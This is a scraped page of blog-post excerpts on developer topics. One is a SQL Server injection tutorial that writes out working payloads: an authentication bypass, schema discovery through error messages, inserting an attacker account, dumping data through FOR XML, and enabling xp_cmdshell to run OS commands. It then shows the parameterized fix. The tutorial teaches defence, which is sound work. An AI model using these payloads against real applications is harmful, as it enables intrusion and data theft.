Search Results

Search found 8840 results on 354 pages for 'drupal developers'.

Page 113/354 | < Previous Page | 109 110 111 112 113 114 115 116 117 118 119 120  | Next Page >

  • A standard style guide or best-practice guide for web application development

    - by gutch
    I run a very small team of developers on a web application, just three people (and not even full time). We're all capable developers, but we write our code in very different ways: we name similar things in different ways, we use different HTML and CSS to achieve similar outcomes. We can manage this OK because we're small, but can't help feeling it would be better to get some standards in place. Are there any good style guides or best-practice guides for web application development that we can use to keep our code under control? Sure, we could write them ourselves. But the reality is that with lots to do and very few staff, we're not going to bother. We need something off the shelf that we can tinker with rather than start from scratch. What we're not looking for here is basic code formatting rules like "whether to use tabs or spaces" or "where to put line breaks" — we can control this by standardising our IDEs. What we are looking for are rules for code and markup. For example: What HTML markup should be used for headers, tables, sidebars, buttons, etc. When to add new CSS styles, and what to name them When IDs should be allocated to HTML elements, and what to name them How Javascript functions should be declared and called How to pick an appropriate URL for given page or AJAX call When to use each HTTP method, ie POST vs GET vs PUT etc How to name server-side methods (Java, in our case) How to throw and handle errors and exceptions in a consistent way etc, etc.

    Read the article

  • Getting More Out of UPK

    - by [email protected]
    Are you getting the most out of UPK? Remember the idea of streamlining your content creation efforts? How about the concept of collaboration during development? How are you leveraging the System Process Documents or Test Scripts? Is your training team benefiting from the creation of process documentation? Is UPK linked into the help menu of your application or your even at the browser level (Smart Help)? Many customers underutilize UPK. Some customers just think of UPK as a training creation solution or just for creating documentation. To get the full value of UPK you need to first evaluate how the UPK developer is installed. Single User or Multi User? If you have more than two developers of UPK, then there is a significant benefit from installing UPK in multi user mode. This helps drive collaboration, automatic version control and better facilitation of the workflow and state features with use of customized views for the developers. Has your organization installed Usage Tracking? How are the outputs deployed and for how many applications? If these questions have you thinking about your overall usage of UPK and you see significant improvement by using more of what UPK has to offer, then it could be time for a UPK Health Check. Contact your UPK Sales Consultant to help understand your environment and how to maximize the value of UPK and start getting more out of the product.

    Read the article

  • Solving Kaggle’s Bike Sharing Demand Machine Learning Problem

    - by Gopinath
    Kaggle.com hosts a lot of interesting machine learning problems online and thousands of its members compete to solve them for a bounty. Problems hosted on Kaggle has varying complexity to accomodate newbies to rock star developers – few problems are good enough for  newbies to learn basics of machine learning and few of them challenge the best of machine learning developers. I’m learning basics of machine learning for the past few weeks and had an opportunity to solve Kaggel’s Bike Sharing Demand problem. Bike Sharing systems allows customers to rent a bike (or a cycle as it is called in many part of the world) for several hours and return them back . The problem provides historical information about the demand for bike sharing business and we need to forecast the demand. For more information on the problem, visit Kaggle.com website. Here is the solution I written using random forests algorithm using R programming language and you can download the source code from github.  With this solution I was able to score RMSLE of 0.70117, which placed me somewhere in the mid of the leader board.  This is the best score I could get by spending 4 hours of my time. Please feel free to fork the code and improve it.   Get Kaggle Bike Sharing Demand solution code from GitHub

    Read the article

  • Windows 8, the biggest struggle&hellip;.

    - by Dennis Vroegop
    As always, it’s hard to be original. It’s easy to copy great stuff others have done but to think of something nice that others might have done is not trivial. The number of applications in the Windows 8 Store is growing rappidly. That was to be expected; a lot of developers already have the skills needed to build Win8 apps so all it took was some ideas. And they have ideas. Another factor that helps with the growing number of apps in the store is the availability of the project templates in Visual Studio 2012. When you start a new project you are given a ready to run sample that you can adapt to your needs. All the stuff needed to navigate through the app, to display data, to do semantic zoom, it’s all available. So what do we do? We tweak, change, adapt and modify these samples to fit our application. However, the underlying structure of the app remains the same. Somehow developers can’t seem to break free from the structure that the sample apps give you. Result: all apps looks alike. My tip for the day: take the samples and use them to learn. Don’t use them as a foundation of your app. Make you app different from those others and you’ll find you will have something special. I’m curious to see what you come up with!

    Read the article

  • CodePlex Daily Summary for Saturday, May 29, 2010

    CodePlex Daily Summary for Saturday, May 29, 2010New ProjectsASP.NET MVC Time Planner: ASP.NET MVC based time planner is example solution that introduces ASP.NET MVC, MSSQL AJAX and jQuery development.Blit Scripting Engine: Blit Scripting Engine provides developers using Microsofts XNA Framework the ability to implement a scripting solution to their games and other pro...Expression Evaluator: This is an article on how to build a basic expression evaluator. It can evaluate any numerical expression combined with trigonometric functions for...Log Analyzer: This project has the aim to help developers to see live log/trace from their application applying visual styles to the grabbed text.LParse: LParse is a monadic parser combinator library, similar to Haskell’s Parsec. It allows you create parsers on C# language. All parsers are first-clas...NeatHtml: NeatHtml™ is a highly-portable open source website component that displays untrusted content securely, efficiently, and accessibly. Untrusted conte...NeatUpload: The NeatUpload ™ ASP.NET component allows developers to stream uploaded files to storage (filesystem or database) and allows users to monitor uplo...NSoup: NSoup is a .NET port of the jsoup (http://jsoup.org) HTML parser and sanitizer originally written in Java. jsoup originally written by Jonathan He...Ordering: c# farm softwarephone7: Project for Windows Phone 7RestCall: A very simple library to make a simple REST call and deserialize to an object. It uses WCF REST Starter Kit and the .net serializer in: System.Runt...SCSM CSV Connector: CSV Connector allows you to specify a data file and mapping location and a scheuled interval in minutes. At each scheduled interval Service Manage...Silverlight Adorner Control: An Adorner is a custom FrameworkElement that is bound to a FrameworkElement and displays information about that element 'above' the element without...Simple Stupid Tools: Simple Stupid ToolsSQScriptRunner: Simple Quick Script Runner allows an administrator to run T-SQL Scripts against one or more servers with common characteristics. For example, an m...ssisassembly: ssisassemblySSRS Report RoboCopy: a tools used to pass a report from a server to anotherTeam Foundation Server Explorer: A standalone Team Foundation Server explorer that can be used to view and manage source files.New Releases(SocketCoder) Full Silverlight Web Video/Voice Conferencing: SocketCoderWebConferencingSystem_Compiled: Installing The Server: 1- before you start you should allow the SocketCoderWCService.MainService.exe service to use the TCP ports from 4528 to 4532...ASP.NET MVC Time Planner: MVC Time Planner - v0.0.1.0: First public alpha of MVC Time Planner is now available. I got a lot of letters from my ASP.NET blog readers who are interested in this example sol...AvalonDock: AvalonDock 1.3.3384: Welcome to AvalonDock 1.3 This is the new version of AvalonDock targetting .NET 4 These are the main features that are included: - Target Microso...Blit Scripting Engine: Blit Scripting Engine 1.0: This marks the initial release of the Blit Scripting Engine. It provides the ability to compile scripts to an assembly, load pre-compiled assemblie...Community Forums NNTP bridge: Community Forums NNTP Bridge V12: Release of the Community Forums NNTP Bridge to access the social and anwsers MS forums with a single, open source NNTP bridge. This release has add...Community Forums NNTP bridge: Community Forums NNTP Bridge V13: Release of the Community Forums NNTP Bridge to access the social and anwsers MS forums with a single, open source NNTP bridge. This release has add...CSharp Intellisense: V2.4: bug fix: Pascal Casing, Single Selection and other selection errorsExpression Evaluator: Expression Evaluator - Visual Studio 2010: Visual Studio 2010 VersionFacebook Graph Toolkit: Preview 2: Preview 2 updates the source to be much more like the Facebook PHP-SDK. Additionally, the code has been updated to follow StyleCop framework rules....Facebook Graph Toolkit: Preview 3: Rest API now working although not fully tested. Removed JsonObject and JsonArray custom dynamic objects in favor of standard ExpandoObject and List...Free Silverlight & WPF Chart Control - Visifire: Visifire SL and WPF Charts v3.1.1 beta Released: Hi, Today we are releasing the two most awaited features i.e, Logarithmic axis and auto update of y-axis while Scrolling and Zooming. * Logar...Free Silverlight & WPF Chart Control - Visifire: Visifire SL and WPF Charts v3.5.4 beta Released: Hi, Today we are releasing the two most awaited features i.e, Logarithmic axis and auto update of y-axis while Scrolling and Zooming. Logarithmic...Fulcrum: Fulcrum 1.0: Initial release.Git Source Control Provider: V 0.3: V 0.3 Add automatic status refresh when files in solution folder changedIBCSharp: IBCSharp 1.04: What IBCSharp 1.04.zip unzips to: http://i50.tinypic.com/205qofl.png IBCSharp Change Log 1.04 - 5/28/2010 Updated IBClient.dll to IB API version...MapWindow6: MapWindow 6.0 May 28 2010: This shifts the projection library to System.Spatial.Projections instead of MWProj4. This also fixes a meter/feet conversion error.Microsoft Health Common User Interface: Release 8.2.51.000: This is version 8.2 of the Microsoft® Health Common User Interface Control Toolkit. This release includes code updates to controls as listed below....NeatHtml: NeatHtml-trunk.221: Adds support for Internet Explorer Mobile 6.NeatUpload: NeatUpload-1.3.25: Fixes the following bugs: SWFUpload.swf could not be served by a CDN because it was embedded without setting allowScriptAccess="always". NeatUpl...NSoup: NSoup 0.1: Initial port release. Corresponds to jsoup version 0.3.1.Numina Application/Security Framework: Numina.Framework Core 53265: Visit http://framework.numina.net to help get you started.Nuntio Content: Nuntio Content 4.2.0: This upgrades MagicContent instances to the latest version that is now called NuntioContent. While this release is quite stable it is still marked ...patterns & practices: Composite WPF and Silverlight: ProjectLinker Source for VS2010 - May 2010: The ProjectLinker helps keep the source for two projects in sync by automatically creating a linked file in one project as files are added in anoth...phone7: Prism for WP7: This the first version of prism for wp7SCSM CSV Connector: SCSM CSV Connector Version 0.1: Release Notes This is the first release of the SCSM CSV Connector solution. It is an 'alpha' release and has only been tested by the developers on ...Silverlight Adorner Control: 1.0: Initial releaseSilverlight Web Comic: Comic 1.1.1: Comic Beta with functionality to button newSilverlight Web Comic: Web Comic 1.1: This version has a little implementation no visible about the future versions, options to new, save, and load. The next version has a better review...Simple.NET: Simple.Mocking 1.0.0.6: Initial version of a new mocking framework for .NET Revision 1: Expect.AnyInocationOn<T>(T target) changed to Expect.AnyInocationOn(object target...Sonic.Net: Sonic.Net v1.0.1 For Unity 2.0: This Version is a port to VS2010 of the codebase with support for unity 2.0. note: currently follows the xsd schema of the previous unity Configur...Squiggle - A Free open source Lan Messenger: Squiggle 1.0.2: v1.0 Release.Team Foundation Server Explorer: Beta 1: The first public beta release of the TFS Explorer.thinktecture WSCF.blue: WSCF.blue V1 Update (1.0.8): Bug fix release with the following fix: When an XmlArrayAttribute decorated member has IsNullable=false, and the List<T> or Collection option is s...VCC: Latest build, v2.1.30528.0: Automatic drop of latest buildVisual Studio 2010 AutoScroller Extension: AutoScroller v0.4: A Visual studio 2010 auto-scroller extension. Simply hold down your middle mouse button and drag the mouse in the direction you wish to scroll, fu...WatchersNET CKEditor™ Provider for DotNetNuke: CKEditor Provider 1.10.03: !!Whats New Added CKEditor 3.3 Revision 5542 changes Options: Default Toolbar Set to Full for Administrators Browser Window: Increased Size of ...Most Popular ProjectsRawrWBFS ManagerAJAX Control ToolkitMicrosoft SQL Server Product Samples: DatabaseSilverlight ToolkitWindows Presentation Foundation (WPF)patterns & practices – Enterprise LibraryMicrosoft SQL Server Community & SamplesPHPExcelASP.NETMost Active ProjectsAStar.netpatterns & practices – Enterprise LibraryBlogEngine.NETGMap.NET - Great Maps for Windows Forms & PresentationCommunity Forums NNTP bridgeRawrSqlServerExtensionsCustomer Portal Accelerator for Microsoft Dynamics CRMPAPpatterns & practices: Windows Azure Security Guidance

    Read the article

  • Should a developer create test cases and then run through test cases

    - by Eben Roux
    I work for a company where the development manager expects a developer to create test cases before writing any code. These test cases have to then be maintained by the developers. Every-so-often a developer will be expected to run through the test cases. From this you should be able to gather that the company in question is rather small and there are no testers. Coming from a Software Architect position and having to write / execute test cases wearing my 'tester' hat is somewhat of a shock to the system. I do it anyway but it does seem to be a rather expensive exercise :) EDIT: I seem to need to elaborate here: I am not talking about unit-testing, TDD, etc. :) I am talking about that bit of testing a tester does. Once I have developed a system (with my unit tests / tdd / etc.) the software goes through a testing phase. Should a developer be that tester and developer those test cases? I think the misunderstanding may stem from the fact that developers, typically, are not involved with this type of testing and, therefore, assumed I am referring to that testing we do do: unit testing. But alas, no. I hope that clears it up.

    Read the article

  • Kinect Presentation at Chippewa Valley Code Camp

    - by mbcrump
    On November 12th 2011, I gave a presentation at Chippewa Valley Code Camp titled, “Kinecting the Dots with the Kinect SDK”. As promised, here is the Slides / Code / Resources to my talk. (click image to download slides) The Kinect for Windows SDK beta is a starter kit for applications developers that includes APIs, sample code, and drivers. This SDK enables the academic research and enthusiast communities to create rich experiences by using Microsoft Xbox 360 Kinect sensor technology on computers running Windows 7. Resources : Download Kinect for Windows SDK beta 2 – You can either download a 32 or 64 bit SDK depending on your OS. FAQ for Kinect for Windows SDK Beta 2 Kinect for Windows SDK Quickstarts for Windows SDK Beta 2 Information on upgrading Kinect Applications to MS SDK Beta 2. – Brand new post by me on how to upgrade Kinect applications to Beta 2. Getting the Most out of the Kinect SDK by me for the Microsoft MVP Award Program Blog. My “Busy Developers Guide to the Kinect SDK” (still references Beta 1 – but most information is still valid) Helpful toolkits / templates mentioned in the talk. Coding4Fun Kinect Toolkit – Lots of extension methods and controls for WPF and WinForms. KinectContrib – Visual Studio 2010 Templates (not updated for Beta 2 as of 11/14/2011). Fun Projects for learning purposes (all updated to Beta 2): Kinect Mouse Cursor – Use your hands to control things like a mouse created by Brian Peek. Kinect Paint – Basically MS Paint but use your hands! Kinecting the Dots: Adding Buttons to your Kinect Application (not on Beta 2 – but check out the guide by me on how to do this) Thanks for attending! I had a really great time at the event and would like to personally thank everyone for coming out to support the local community.  Thanks for reading. Subscribe to my feed

    Read the article

  • SQL Server SQL Injection from start to end

    - by Mladen Prajdic
    SQL injection is a method by which a hacker gains access to the database server by injecting specially formatted data through the user interface input fields. In the last few years we have witnessed a huge increase in the number of reported SQL injection attacks, many of which caused a great deal of damage. A SQL injection attack takes many guises, but the underlying method is always the same. The specially formatted data starts with an apostrophe (') to end the string column (usually username) check, continues with malicious SQL, and then ends with the SQL comment mark (--) in order to comment out the full original SQL that was intended to be submitted. The really advanced methods use binary or encoded text inputs instead of clear text. SQL injection vulnerabilities are often thought to be a database server problem. In reality they are a pure application design problem, generally resulting from unsafe techniques for dynamically constructing SQL statements that require user input. It also doesn't help that many web pages allow SQL Server error messages to be exposed to the user, having no input clean up or validation, allowing applications to connect with elevated (e.g. sa) privileges and so on. Usually that's caused by novice developers who just copy-and-paste code found on the internet without understanding the possible consequences. The first line of defense is to never let your applications connect via an admin account like sa. This account has full privileges on the server and so you virtually give the attacker open access to all your databases, servers, and network. The second line of defense is never to expose SQL Server error messages to the end user. Finally, always use safe methods for building dynamic SQL, using properly parameterized statements. Hopefully, all of this will be clearly demonstrated as we demonstrate two of the most common ways that enable SQL injection attacks, and how to remove the vulnerability. 1) Concatenating SQL statements on the client by hand 2) Using parameterized stored procedures but passing in parts of SQL statements As will become clear, SQL Injection vulnerabilities cannot be solved by simple database refactoring; often, both the application and database have to be redesigned to solve this problem. Concatenating SQL statements on the client This problem is caused when user-entered data is inserted into a dynamically-constructed SQL statement, by string concatenation, and then submitted for execution. Developers often think that some method of input sanitization is the solution to this problem, but the correct solution is to correctly parameterize the dynamic SQL. In this simple example, the code accepts a username and password and, if the user exists, returns the requested data. First the SQL code is shown that builds the table and test data then the C# code with the actual SQL Injection example from beginning to the end. The comments in code provide information on what actually happens. /* SQL CODE *//* Users table holds usernames and passwords and is the object of out hacking attempt */CREATE TABLE Users( UserId INT IDENTITY(1, 1) PRIMARY KEY , UserName VARCHAR(50) , UserPassword NVARCHAR(10))/* Insert 2 users */INSERT INTO Users(UserName, UserPassword)SELECT 'User 1', 'MyPwd' UNION ALLSELECT 'User 2', 'BlaBla' Vulnerable C# code, followed by a progressive SQL injection attack. /* .NET C# CODE *//*This method checks if a user exists. It uses SQL concatination on the client, which is susceptible to SQL injection attacks*/private bool DoesUserExist(string username, string password){ using (SqlConnection conn = new SqlConnection(@"server=YourServerName; database=tempdb; Integrated Security=SSPI;")) { /* This is the SQL string you usually see with novice developers. It returns a row if a user exists and no rows if it doesn't */ string sql = "SELECT * FROM Users WHERE UserName = '" + username + "' AND UserPassword = '" + password + "'"; SqlCommand cmd = conn.CreateCommand(); cmd.CommandText = sql; cmd.CommandType = CommandType.Text; cmd.Connection.Open(); DataSet dsResult = new DataSet(); /* If a user doesn't exist the cmd.ExecuteScalar() returns null; this is just to simplify the example; you can use other Execute methods too */ string userExists = (cmd.ExecuteScalar() ?? "0").ToString(); return userExists != "0"; } }}/*The SQL injection attack example. Username inputs should be run one after the other, to demonstrate the attack pattern.*/string username = "User 1";string password = "MyPwd";// See if we can even use SQL injection.// By simply using this we can log into the application username = "' OR 1=1 --";// What follows is a step-by-step guessing game designed // to find out column names used in the query, via the // error messages. By using GROUP BY we will get // the column names one by one.// First try the Idusername = "' GROUP BY Id HAVING 1=1--";// We get the SQL error: Invalid column name 'Id'.// From that we know that there's no column named Id. // Next up is UserIDusername = "' GROUP BY Users.UserId HAVING 1=1--";// AHA! here we get the error: Column 'Users.UserName' is // invalid in the SELECT list because it is not contained // in either an aggregate function or the GROUP BY clause.// We have guessed correctly that there is a column called // UserId and the error message has kindly informed us of // a table called Users with a column called UserName// Now we add UserName to our GROUP BYusername = "' GROUP BY Users.UserId, Users.UserName HAVING 1=1--";// We get the same error as before but with a new column // name, Users.UserPassword// Repeat this pattern till we have all column names that // are being return by the query.// Now we have to get the column data types. One non-string // data type is all we need to wreck havoc// Because 0 can be implicitly converted to any data type in SQL server we use it to fill up the UNION.// This can be done because we know the number of columns the query returns FROM our previous hacks.// Because SUM works for UserId we know it's an integer type. It doesn't matter which exactly.username = "' UNION SELECT SUM(Users.UserId), 0, 0 FROM Users--";// SUM() errors out for UserName and UserPassword columns giving us their data types:// Error: Operand data type varchar is invalid for SUM operator.username = "' UNION SELECT SUM(Users.UserName) FROM Users--";// Error: Operand data type nvarchar is invalid for SUM operator.username = "' UNION SELECT SUM(Users.UserPassword) FROM Users--";// Because we know the Users table structure we can insert our data into itusername = "'; INSERT INTO Users(UserName, UserPassword) SELECT 'Hacker user', 'Hacker pwd'; --";// Next let's get the actual data FROM the tables.// There are 2 ways you can do this.// The first is by using MIN on the varchar UserName column and // getting the data from error messages one by one like this:username = "' UNION SELECT min(UserName), 0, 0 FROM Users --";username = "' UNION SELECT min(UserName), 0, 0 FROM Users WHERE UserName > 'User 1'--";// we can repeat this method until we get all data one by one// The second method gives us all data at once and we can use it as soon as we find a non string columnusername = "' UNION SELECT (SELECT * FROM Users FOR XML RAW) as c1, 0, 0 --";// The error we get is: // Conversion failed when converting the nvarchar value // '<row UserId="1" UserName="User 1" UserPassword="MyPwd"/>// <row UserId="2" UserName="User 2" UserPassword="BlaBla"/>// <row UserId="3" UserName="Hacker user" UserPassword="Hacker pwd"/>' // to data type int.// We can see that the returned XML contains all table data including our injected user account.// By using the XML trick we can get any database or server info we wish as long as we have access// Some examples:// Get info for all databasesusername = "' UNION SELECT (SELECT name, dbid, convert(nvarchar(300), sid) as sid, cmptlevel, filename FROM master..sysdatabases FOR XML RAW) as c1, 0, 0 --";// Get info for all tables in master databaseusername = "' UNION SELECT (SELECT * FROM master.INFORMATION_SCHEMA.TABLES FOR XML RAW) as c1, 0, 0 --";// If that's not enough here's a way the attacker can gain shell access to your underlying windows server// This can be done by enabling and using the xp_cmdshell stored procedure// Enable xp_cmdshellusername = "'; EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;";// Create a table to store the values returned by xp_cmdshellusername = "'; CREATE TABLE ShellHack (ShellData NVARCHAR(MAX))--";// list files in the current SQL Server directory with xp_cmdshell and store it in ShellHack table username = "'; INSERT INTO ShellHack EXEC xp_cmdshell \"dir\"--";// return the data via an error messageusername = "' UNION SELECT (SELECT * FROM ShellHack FOR XML RAW) as c1, 0, 0; --";// delete the table to get clean output (this step is optional)username = "'; DELETE ShellHack; --";// repeat the upper 3 statements to do other nasty stuff to the windows server// If the returned XML is larger than 8k you'll get the "String or binary data would be truncated." error// To avoid this chunk up the returned XML using paging techniques. // the username and password params come from the GUI textboxes.bool userExists = DoesUserExist(username, password ); Having demonstrated all of the information a hacker can get his hands on as a result of this single vulnerability, it's perhaps reassuring to know that the fix is very easy: use parameters, as show in the following example. /* The fixed C# method that doesn't suffer from SQL injection because it uses parameters.*/private bool DoesUserExist(string username, string password){ using (SqlConnection conn = new SqlConnection(@"server=baltazar\sql2k8; database=tempdb; Integrated Security=SSPI;")) { //This is the version of the SQL string that should be safe from SQL injection string sql = "SELECT * FROM Users WHERE UserName = @username AND UserPassword = @password"; SqlCommand cmd = conn.CreateCommand(); cmd.CommandText = sql; cmd.CommandType = CommandType.Text; // adding 2 SQL Parameters solves the SQL injection issue completely SqlParameter usernameParameter = new SqlParameter(); usernameParameter.ParameterName = "@username"; usernameParameter.DbType = DbType.String; usernameParameter.Value = username; cmd.Parameters.Add(usernameParameter); SqlParameter passwordParameter = new SqlParameter(); passwordParameter.ParameterName = "@password"; passwordParameter.DbType = DbType.String; passwordParameter.Value = password; cmd.Parameters.Add(passwordParameter); cmd.Connection.Open(); DataSet dsResult = new DataSet(); /* If a user doesn't exist the cmd.ExecuteScalar() returns null; this is just to simplify the example; you can use other Execute methods too */ string userExists = (cmd.ExecuteScalar() ?? "0").ToString(); return userExists == "1"; }} We have seen just how much danger we're in, if our code is vulnerable to SQL Injection. If you find code that contains such problems, then refactoring is not optional; it simply has to be done and no amount of deadline pressure should be a reason not to do it. Better yet, of course, never allow such vulnerabilities into your code in the first place. Your business is only as valuable as your data. If you lose your data, you lose your business. Period. Incorrect parameterization in stored procedures It is a common misconception that the mere act of using stored procedures somehow magically protects you from SQL Injection. There is no truth in this rumor. If you build SQL strings by concatenation and rely on user input then you are just as vulnerable doing it in a stored procedure as anywhere else. This anti-pattern often emerges when developers want to have a single "master access" stored procedure to which they'd pass a table name, column list or some other part of the SQL statement. This may seem like a good idea from the viewpoint of object reuse and maintenance but it's a huge security hole. The following example shows what a hacker can do with such a setup. /*Create a single master access stored procedure*/CREATE PROCEDURE spSingleAccessSproc( @select NVARCHAR(500) = '' , @tableName NVARCHAR(500) = '' , @where NVARCHAR(500) = '1=1' , @orderBy NVARCHAR(500) = '1')ASEXEC('SELECT ' + @select + ' FROM ' + @tableName + ' WHERE ' + @where + ' ORDER BY ' + @orderBy)GO/*Valid use as anticipated by a novice developer*/EXEC spSingleAccessSproc @select = '*', @tableName = 'Users', @where = 'UserName = ''User 1'' AND UserPassword = ''MyPwd''', @orderBy = 'UserID'/*Malicious use SQL injectionThe SQL injection principles are the same aswith SQL string concatenation I described earlier,so I won't repeat them again here.*/EXEC spSingleAccessSproc @select = '* FROM INFORMATION_SCHEMA.TABLES FOR XML RAW --', @tableName = '--Users', @where = '--UserName = ''User 1'' AND UserPassword = ''MyPwd''', @orderBy = '--UserID' One might think that this is a "made up" example but in all my years of reading SQL forums and answering questions there were quite a few people with "brilliant" ideas like this one. Hopefully I've managed to demonstrate the dangers of such code. Even if you think your code is safe, double check. If there's even one place where you're not using proper parameterized SQL you have vulnerability and SQL injection can bare its ugly teeth.

    Read the article

  • SQL SERVER – Three Methods to Insert Multiple Rows into Single Table – SQL in Sixty Seconds #024 – Video

    - by pinaldave
    One of the biggest ask I have always received from developers is that if there is any way to insert multiple rows into a single table in a single statement. Currently when developers have to insert any value into the table they have to write multiple insert statements. First of all this is not only boring it is also very much time consuming as well. Additionally, one has to repeat the same syntax so many times that the word boring becomes an understatement. In the following quick video we have demonstrated three different methods to insert multiple values into a single table. -- Insert Multiple Values into SQL Server CREATE TABLE #SQLAuthority (ID INT, Value VARCHAR(100)); Method 1: Traditional Method of INSERT…VALUE -- Method 1 - Traditional Insert INSERT INTO #SQLAuthority (ID, Value) VALUES (1, 'First'); INSERT INTO #SQLAuthority (ID, Value) VALUES (2, 'Second'); INSERT INTO #SQLAuthority (ID, Value) VALUES (3, 'Third'); Clean up -- Clean up TRUNCATE TABLE #SQLAuthority; Method 2: INSERT…SELECT -- Method 2 - Select Union Insert INSERT INTO #SQLAuthority (ID, Value) SELECT 1, 'First' UNION ALL SELECT 2, 'Second' UNION ALL SELECT 3, 'Third'; Clean up -- Clean up TRUNCATE TABLE #SQLAuthority; Method 3: SQL Server 2008+ Row Construction -- Method 3 - SQL Server 2008+ Row Construction INSERT INTO #SQLAuthority (ID, Value) VALUES (1, 'First'), (2, 'Second'), (3, 'Third'); Clean up -- Clean up DROP TABLE #SQLAuthority; Related Tips in SQL in Sixty Seconds: SQL SERVER – Insert Multiple Records Using One Insert Statement – Use of UNION ALL SQL SERVER – 2008 – Insert Multiple Records Using One Insert Statement – Use of Row Constructor I encourage you to submit your ideas for SQL in Sixty Seconds. We will try to accommodate as many as we can. If we like your idea we promise to share with you educational material. Reference: Pinal Dave (http://blog.sqlauthority.com) Filed under: Database, Pinal Dave, PostADay, SQL, SQL Authority, SQL in Sixty Seconds, SQL Query, SQL Scripts, SQL Server, SQL Server Management Studio, SQL Tips and Tricks, T SQL, Technology, Video

    Read the article

  • Yay! Oracle Solaris 11.1 Is Here!

    - by rickramsey
    Even the critters are happy. This is no cosmetic release. It's got TONS of new stuff for both system admins and system developers. In the coming weeks and months I'll highlight specific new capabilities, but for now, here are a few resources to get you started. What's New (pdf) Describes enhancements for sysadmins in: Installation System configuration Virtualization Security and Compliance Networking Data management Kernel/platform support Network drivers User environment And for system developers: Preflight Applications Checker Oracle ExaStack Labs (available to Oracle Partner Network Gold-level members for application certification) Oracle Solaris Studio Integrated Java Virtual Machine (JVM): Updates are now managed using the Image Packaging System (IPS) Migration guides and technology mapping tables for AIX, HP-UX and Red Hat Linux: Download Free downloads for SPARC and x86 are available, along with instructions and tips for using the new repositories and Image Packaging System. Tech Article: How to Upgrade to Oracle Solaris 11.1 You can upgrade using either Oracle's official Solaris release repository or, if you have a support contract, the Support repository. Peter Dennis explains how. Documentation Superbly written instructions from our dedicated cadre of world-renowned but woefully underpaid technical writers: Getting Started Installing, Booting, and Updating Establishing an Oracle Solaris Network Administering Essential Features Administering Network Services Securing the Operating System Monitoring and Tuning Creating and Using Virtual Environments Working with the Desktop Developing Applications Reference Manuals And more Training And don't forget the new online training courses from Oracle University! I really liked them. Here are my first and second impressions. Website Newsletter Facebook Twitter

    Read the article

  • UX Design Principles Pluralsight course review

    - by pluginbaby
    I've just finished the "Creating User Experiences: Fundamental Design Principles" course on Pluralsight, I am glad I took it, and here is why you should. The course is held by Billy Hollis, an internationally known author and speaker focused on user experience design. It was published in May 2012, so it is quite fresh (You’ll hear some reference to XAML, even if the content is not focused on any particular technology). I think what I liked the most about this course is the fact that Billy is not just imposing design ideas and pushing them in your throat (which would be too confronting for us developers, even if he was right), he spends a fair share amount of time explaining each topics, and illustrate them with great metaphors. If you are a minimum open minded you should get great value out of this course. Billy makes you think outside the box, he encourages you to use your right side brain, and understand design principles by simply looking at what’s around us (physical objects, nature, …). During the course he refers several time to "don't make me think" a book on UX design, which is about giving confidence to users, by making it easier for them to achieve their goals when using your app. Billy thinks that every developer can participate in elaborating good design when building software, not only designers should be involved. Get away of the easy path "let's build functional stuff for now and we will hire a designer later if we have time and budget". The course is also live and interactive as the author suggests that you do some live exercises during each module. He actually makes you realize and understand by yourself the need for change. We’re in a new era of software and devices, where grids and menus aren't enough. You can’t remain satisfied by just making things possible, you need to make them easier for your users. Understanding some fundamental design principles will help. This course can definitely be followed by any developers who wants to improve user experience of software they are working on, and I definitely recommend it.

    Read the article

  • Rescue overdue offshore projects and convince management to use automated tests

    - by oazabir
    I have published two articles on codeproject recently. One is a story where an offshore project was two months overdue, my friend who runs it was paying the team from his own pocket and he was drowning in ever increasing number of change requests and how we brainstormed together to come out of that situation. Tips and Tricks to rescue overdue projects Next one is about convincing management to go for automated test and give developers extra time per sprint, at the cost of reduced productivity for couple of sprints. It’s hard to negotiate this with even dev leads, let alone managers. Whenever you tell them - there’s going to be less features/bug fixes delivered for next 3 or 4 sprints because we want to automate the tests and reduce manual QA effort; everyone gets furious and kicks you out of the meeting. Especially in a startup where every sprint is jam packed with new features and priority bug fixes to satisfy various stakeholders, including the VCs, it’s very hard to communicate the benefits of automated tests across the board. Let me tell you of a story of one of my startups where I had the pleasure to argue on this and came out victorious. How to convince developers and management to use automated test instead of manual test If you like these, please vote for me!

    Read the article

  • What needs to be done to port a Windows Flash game to Android?

    - by Russell Yan
    My team has developed a game using Flash (with Lua embeded) that targets Windows. And we want to port that game to Android (also iOS in the future). It's acceptable to rewrite the Flash part of client. And some other team in our company recommended Unity3D to replace the Flash part. Since we have no experience in Android/iOS development, we would need to learn some new tool/language anyway. So we would like that learning still be useful after the porting and when we starting a new game. Any thoughts? Edits: I think it is worth noticing the background of the game : the project is started by a tester and developer, both without knowing much about flex and actionscript. They built the game while learning, so most of the code is hard to maintain. I and other two developers joined the project after a year or so when one has leave (and the other be our manager). The other two developers are just graduates with little experience and little knowledge of flex. I am good at the server part and the c# language. Based on the fact that the code is hard to maintain (and we do need to change a lot of code to make the game easier to playe in a mobile device), and I am good at c# (and learning). I still tend to do the porting with Unity, which could get better performance and possibly save time.

    Read the article

  • CodePlex Daily Summary for Wednesday, June 16, 2010

    CodePlex Daily Summary for Wednesday, June 16, 2010New ProjectsAtomFeedBuilder: Simple and lightweight Atom feed builder. Developed in VB.Net.Cable and Wire harness tester: If you build lots of cable/wire harness' you know that testing them is a pain. I have wanted an automated cable tester for a while now but commerci...Carmenta Engine Power Pack: The target of Carmenta Engine Power Pack is to provide extensions, utilities and wrapper classes that allows developers to work more efficiently w...Customer Book: Customer Book, its like address book with facility for generating quotation for a business or a supplier to the clients.Dialector: Using this program, you can convert pure Turkish texts into different dialects; such as: Emmi, Kufurbaz, Kusdili, Laz, Peltek, Tiki, and many more....Downline Commision Generator: Analyze the compensations plan of the organizations in multi-level marketing or network marketing. Check with this tool the commision plan of the c...EmbeddedSpark 2010 Project M: Project M is a system for seamlessly interfacing a tabletop interface to portable devices placed upon it. Using image recognition and projectors, P...Event Log Creator by eVestment Alliance: Provides a simple utility to create a new source and log in the Windows event log. The utility checks if the current user is an administrator, and...ExchangeHog: Desktop/daemon application that aggregates emails from multiple pop3-accounts into single Microsoft Exchange 2010 account. For users receiving ema...Extra Time Calculator: Extra Time Calculator allows exam end times to be easily calculated for students receiving an extra time accommodation.Generic WCF Hosting Service: The Generic Host Service provides a simple, reusable, and reliable mechanism for hosting WCF services. Google Storage for .NET: Google Storage for .NET (GSN) is an open source library that provides .NET developers with easy access to the Google Storage API. The library allo...Helium: The Helium XNA game engine is a light portable game engine designed to work on many platforms and soon to be expanded on more. Currently the 